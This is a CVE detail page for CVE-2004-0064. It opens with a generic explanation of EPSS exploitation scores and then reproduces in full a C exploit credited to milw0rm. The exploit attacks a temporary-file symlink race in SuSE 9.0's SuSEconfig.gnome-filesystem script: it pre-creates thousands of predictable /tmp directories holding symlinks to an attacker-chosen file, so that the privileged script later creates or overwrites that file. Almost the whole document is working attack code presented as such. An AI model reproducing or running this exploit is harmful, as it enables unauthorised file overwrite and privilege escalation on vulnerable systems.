CVE-2004-0064 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#include <stdio.h> #include <unistd.h> #include <string.h> #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem." #define START 1 #define END 33000 int main(int argc, char **argv) { int i; char buf[150]; printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem exploit\n"); printf("\t------------------------------------------------------------- \n"); printf("\tdiscovered and written by l0om <l0om excluded org>\n"); printf("\t WWW.EXCLUDED.ORG\n\n"); if(argc != 2) { printf("usage: %s <destination-file>\n",argv[0]); exit(0xff); } printf("### hit enter to create or overwrite file % s: ",argv[1]); fflush(stdout); read(1, buf, 1); fflush(stdin); umask(0000); printf("working\n\n"); for(i = START; i < END; i++) { snprintf(buf, sizeof(buf),"%s%d",PATH,i); if(mkdir(buf,00777) == -1) { fprintf(stderr, "cannot creat directory [Nr.%d] \n",i); exit(0xff); } if(!(i%1000))printf("."); strcat(buf, "/found"); if(symlink(argv[1], buf) == -1) { fprintf(stderr, "cannot creat symlink from %s to %s [Nr.%d]\n",buf,argv[1],i); exit(0xff); } } printf("\ndone!\n"); printf("next time the SuSE.gnome-filesystem script gets executed\n"); printf("we will create or overwrite file %s \n",argv[1]); return(0x00); } /* i cant wait for the new gobbles comic!! */ // milw0rm.com [2004-01-15]